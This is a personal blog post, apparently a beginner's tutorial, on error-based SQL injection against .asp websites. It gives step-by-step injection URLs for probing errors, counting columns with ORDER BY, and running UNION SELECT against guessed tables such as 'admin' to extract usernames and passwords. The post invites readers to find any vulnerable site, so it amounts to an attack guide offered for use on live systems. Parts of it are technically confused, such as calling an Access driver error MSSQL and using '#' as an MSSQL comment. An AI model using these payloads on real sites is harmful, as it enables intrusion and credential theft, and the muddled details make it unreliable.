Basic Error Based MSSQL Injection

Hello,

I am Aaditya Purani, and here is my first blog post. I want to share my paper today.

This is my paper about Basic error based MSSQL Injection. You can find it on Milw00rm too

https://www.milw00rm.com/lessons/10342.pdf

So first of all we will find some site that is Vulnerable and is on .asp

So assume that u got a site with the name of

now find page where the site is vul to sql injection…

You can check the Vulnerability by adding single quotation ‘
at the end of URL like

If u get this error…

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘department_id=1024”.

/deptdet.asp, line 122

Then this means the site is vuln to sql injections…
Now we are going to find the columns in it…
Normally we use — at the end of string but in this case we will be using #

Suppose that the site has 10 columns…when you will use the query “order by 1#” (without double quotations)

You will not get any error…the page will load normally…but when you will use the query “order by 11#” (without double quotations) you will get an error this means that the site has 10 columns…

So we will have an error on this query

But when we will use this query, we will not get any error.

This tells us that the table has 10 columns.

If this is not working use string:

Code:
http://www.target.com/product.asp?' and 1=2 ORDER BY 10--
or
http://www.target.com/product.asp?' and 1=2 ORDER BY 10#

This should work 🙂,

Now we will write the query as…

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#

So now in next step we need name of a table to get number of targets visible column from all ..

let me explain bit , like in simple sql injection we use

Code:
union select 1,2,3,4,5,6 --

and we get a number to get information from site , in this we need a table name to get that number of visible column ,

so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10

in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are ” admin,tbladmin,tbl_admin,user,users,login,info,email” etc . Suppose in the site we got admin table that is visible. Now our url will look like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#

After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible…

So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,

Now our URL will look like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#

Suppose we got a username instead of the number 3.

and then change column name with passwords column name
you will get the password 😉
URL will be like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#

Do manual SQLi and you will be the best
Regards,

Aaditya Purani

Advertisements

One thought on “Basic Error Based MSSQL Injection

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s